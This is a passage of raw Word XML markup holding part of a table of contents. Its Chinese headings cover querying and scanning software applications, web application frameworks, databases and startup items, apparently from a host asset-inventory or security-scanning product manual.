            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C1AF682" w14:textId="15E78BBA" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166116" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.1 软件应用信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166116 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="616FC100" w14:textId="0AB461C1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166117" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.2 软件应用信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166117 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="174C0CDF" w14:textId="0DB7A49D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166118" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9.3 软件应用信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166118 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B9681C1" w14:textId="2003CE00" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166119" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10 Web应用框架信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166119 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37FCB28A" w14:textId="563B81B1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166120" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10.1 Web应用框架信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166120 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="745A2169" w14:textId="1CA7F326" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166121" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10.2 Web应用框架信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166121 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40C0ABB6" w14:textId="723D1714" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166122" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10.3 Web应用框架信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166122 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A88349E" w14:textId="5FBB076C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166123" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11 数据库信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166123 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16576087" w14:textId="113A4E1B" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166124" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.1 数据库信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166124 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="311EC754" w14:textId="1334F95E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166125" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.2 数据库信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166125 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04D1A268" w14:textId="01E9AAAF" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166126" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.3 数据库信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166126 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79502ECB" w14:textId="0DDB84AE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166127" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12 启动项信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166127 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="142018BC" w14:textId="71FC4C0E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166128" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12.1 启动项信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166128 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E61A8DC" w14:textId="5801B64C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166129" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12.2 启动项信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166129 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7397BB1D" w14:textId="0902B27E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166130" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12.3 启动项信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166130 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EF23469" w14:textId="28D40B83" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
